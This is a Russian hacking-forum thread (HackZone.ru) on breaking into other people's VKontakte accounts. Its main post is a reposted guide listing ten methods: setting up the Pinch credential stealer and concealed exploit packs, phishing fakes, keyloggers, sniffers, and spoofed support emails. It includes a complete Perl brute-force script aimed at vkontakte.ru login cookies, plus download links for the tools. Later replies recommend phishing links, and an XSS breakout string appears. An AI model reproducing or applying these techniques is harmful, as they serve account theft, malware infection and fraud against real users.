Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Как взломать аккаунт в контакте (VKONTAKTE.RU) (ищем уязвимости, делимся опытом) Актуальные базы 2GIS в форматах CSV,Excel,SQL
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / WEB сайтов RSS подписка на сообщения с форума Subscribe Модераторы: RenGO, Bb0y, B3JIoMep, BRUNOTTI, Virous, xssmailcom
Технологии взлома сайтов - xss, sql injection. Для сообщений "взломайте мне сайт" есть форум "Предложения работы".

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Страницы сообщения: [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26] Просмотров - 1171295
Как взломать аккаунт в контакте (VKONTAKTE.RU) (ищем уязвимости, делимся опытом)
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
Busta


Novice
# | Сообщение добавлено 27.05.2008 23:31:14
Отредактировано 26.10.2008 23:20:47 by DiMan
Подскажите пожалуйста как взломать аккаунт ВКОНТАКТЕ ?
Сказать спасибо Ответить Цитировать

SaTaN


Member
# | Сообщение добавлено 31.05.2008 02:03:38
Отредактировано 31.05.2008 02:07:14 by SaTaN
Есть брутфорсеры для Вконтакте в пабликах хак сайтов,но они неочень хорошо перебирают,для одноклассников вообще кривой брутфорс в сети,если знаешь делфи или С+,легче самому написать,как это сделал я,получился широкополосный брутер вконтакте и по совместительству одноклассников с возможностью юзать прокси,продать извини немогу,юзай паблик брутеры,я с них тоже начинал
Сказать спасибо Ответить Цитировать

SaTaN


Member
# | Сообщение добавлено 31.05.2008 02:10:01
Для одноклассников совсем недавно сплойт выкладывали,очень много акков через него ушло,можно пассы от вконтакте пинчем стащить(но это гиблое дело),хотя можешь попытаться,главное знать как заставить жертву его запустить остальное уже не наше дело:)
Сказать спасибо Ответить Цитировать

SaTaN


Member
# | Сообщение добавлено 14.06.2008 01:08:03
Могу и подсказать,пиши в личку дам ссыль на статью там прога,но советую научиться делфи или си и писать свои брутеры вконтакте и одноклассники собирая по частям исхи
Сказать спасибо Ответить Цитировать

M.W.N.N.


Gold Member
# | Сообщение добавлено 07.09.2008 16:43:06
Отредактировано 22.10.2008 19:40:25 by DiMan
Вот не могу понять разве трудно воспользоваться поиском?
Этих статей на каждом шагу море!
 
Специально для тебя нашел!
Если помог то нажми "Сказать спасибо"
---------------------------------------------------------------
10 способов взлома анкеты vkontakte.ru
---------------------------------------------------------------
Что нам потребуется:
Умение настраивать пинч(если это у вас уже получилось, то остальные 2 требования можно не смотреть)
Прямые руки
Хоть капелька мозга
1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль "корявый", он
 
разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принимает "левый" вид, и соответственно не работает. не в этом
 
суть, поэтому останавливаться не будем
2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке http://slil.ru/25774471
3) Троян. Эту категорию мы разделим на другие.
а) Скинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. http://slil.ru/25774480 - здесь лежит билдер пинча, а
 
здесь парсер http://slil.ru/25774491 , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - http://slil.ru/25774495
б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100%
в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо)
Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777
Скачать 3 связки можно по ссылке http://slil.ru/25776403 - здесь лежат мпак, айспак и армитаж
ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже
 
переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни к чему...
Идем дальше...
Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был.
Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он
 
будет лежать в папке load под именем file.
Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет.
4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&%-AefV)
Для этого брутфорсера нам потребуется активперл скачать мона тут http://download.softportal.com/softw...ctiveperl.html либо по ссылке
 
http://www.denwer.ru/packages/perl.html
Код:
#!/usr/bin/perl
 
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
 
open (pass, "<$dic");
 
Next:
@pass = pass();
 
for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}
for(@trl) { $_->join; }
 
sub Brut
{
 
while (@pass){
 
$pass = shift @pass;
 
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0rn".
"Host: vkontakte.rurn".
"Accept: */*rn".
"Content-Type: application/x-www-form-urlencodedrn".
"User-Agent: Mozillorn".
"C*****: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn".
"Connection: closernrn";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5n";
print "$id:$pass:$md5n";
close good;
exit;}
}
 
}
 
goto Next;
 
sub pass
{
my (@mas);
while (<pass>;){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
 
Не забудьте сменить разширение на brut.pl
$dic = ‘passl.txt’; #паслист для брдутфорсера
$id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы)
$mail = ‘мыло’; #мыло, значек @ меняем на %40
$threads = Х; # где Х - количество потоков
Если вам лень копаться со всем этим, то есть неплохой брут на С. Скачать его можно по ссылке http://slil.ru/25774498, сразу говорю, если не запускается - это
 
ваши проблемы, ибо все прекрасно работает!
5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код ******...
Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на
 
ссылке комбинированная атака на мозг(фейк) и браузер(код ******).
6)Способ приводится много где, здесь нужно поискать сайты на которых сидит жертва(форумы, почта и пр) и попытаться похекать что-то из вышеперечисленного,
 
авось найдем старый заброшенный пароль, а он подойдет.
7) как обычно СИ, пробуем отправить письмо от адресата durov@vkontakte.ru или support@vkontakte.ru с текстом типа, ваша страница на сайте vkontakte.ru будет
 
заблокированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам пароля.
Или, можно прислать письмо типа, вам пришло личное сообщение/открытка и пр, от такого-то пользователя, что бы ее прочитать перейдите по ссылке, а ссылка
 
будет вести на наш фейк.
Что-бы отправить письмо с "левого" адреса, нужен какой-нить майлер, например, этот http://softnic.ru/soft/programm_4223.html, либо любой подходящий для вас
 
из гугла.
Только не забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия.(что бы пароли пришли именно вам на почту)
8) Снифер, тут лучше отправлять его на почту(если мы знаем мыло), тогда мы без лишних проблем сможем перехватить сессию, и с помощью системы восстановления пароля на сайте вконтакте получить письмо с паролем.
http://forum.antichat.ru/showthread.php?p=457280
Есть сниферы и получше, но они платные, все же тема распространена и в гуле можно ввсести запрос на пхп снифер и найти много полезной инфы.
9)ХSS, паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если ооочень долго подождать, то можно и дождаться паблик уязвимости - но
 
такой подход к делу бредовый, поэтому останавливаться на нем не будем.
10) Самый простой способ, единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не помог
 
ни один из 9 пунктов, может найдется умелец который сломает неприступную жертву. Поискать такогого можно здесь - http://www.hackzone.ru/forum/list/fid/23/ или здесь http://www.hackzone.ru/forum/list/fid/4/
Перед тем как задать вопрос воспользуйтесь полезными ссылками:
google.ru
http://www.poiskinfo.net/stat/st1.php
http://segfault.kiev.ua/smart-questions-ru.html
http://penguin.kurgan.ru/doc/Perl/perlfaq1.htm
Ну и на последок - googleforidiots.com
На этом все, надеюсь вам не особо скучно было при чтении всего этого.
(с) [ TRaY ]
 
javascript:/*--&gt;&lt;/marquee&gt;&lt;/script&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;&quot;&gt;
Сказать спасибо Ответить Цитировать

Evil Bait


Novice
# | Сообщение добавлено 25.10.2008 15:29:03
это всё долго и не понятно для новичков... проще всего взломать мыло глупо обманув юзера и выслать запрос из Вконтакте на напоминание пароля.
Сказать спасибо Ответить Цитировать

HACK_ER




Platinum Member
# | Сообщение добавлено 25.10.2008 17:13:10
быстрее фейком! высылаешь письмо от имени admin@vkontakte.ru, где написано "Здравствуйте, Вам пришло сообщение, чтобы прочитать его, перейдите по ссылке http://vkontakte.ru/id5446b5(только вот ссылка на самом деле будет вести на фейк)
Сказать спасибо Ответить Цитировать

pack_man


Novice
# | Сообщение добавлено 27.10.2008 22:28:35
А как взломать контакт через печеньки(сookie)?
Сказать спасибо Ответить Цитировать

daniel


Novice
# | Сообщение добавлено 29.10.2008 11:57:00
Ну в таком случае HTML по-моему нужно норм знать, а также уметь находить XSS-уязвимости.
Сказать спасибо Ответить Цитировать

artanna2007


Novice
# | Сообщение добавлено 12.11.2008 06:59:58
Пробую разобраться в этой статье, про взлом контакта, ни че не умею, но буду пытаться, очень интересно это все.. Такой вопрос, я когда по ссылкам скачиваю эти проги, у меня антивирь вирусы находит и я их загрузить не могу.... че делать то???
Сказать спасибо Ответить Цитировать

Страницы сообщения: [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] [26]
Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Самозащита от вируса Petya
  • Google Pixel взломали за 60 секунд
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...

    Все новости... Все статьи... Прислать новость RSS
  • Интернет / Разное » SOCKS 4/5, HTTPS прокси сервис - proxybuy
  • Разное / Продам, отдам » Продам свежие, июнь 2019, базы 2ГИС(2gis), яндекс.карты
  • Разное / Ищу работу » Re: взлом почты на майле
  • Разное / Предложения работы » Нужен способ заработка, майнинга
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом страниц: ВКонтакте, Одноклассники.
  • Разное / Ищу работу » Re: -=Мощный DDoS service/ДДоС сервис=-
  • Разное / Ищу работу » Re: Взлом почты mail.ru, yandex.ru, rambler, gmail
  • Разное / Ищу работу » Re: Качественный подбор паролей к почтам. Работаем с 2011 го...
  • Разное / Ищу работу » Re: Взлом ВКонтакте на заказ. Взлом почты на заказ.

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}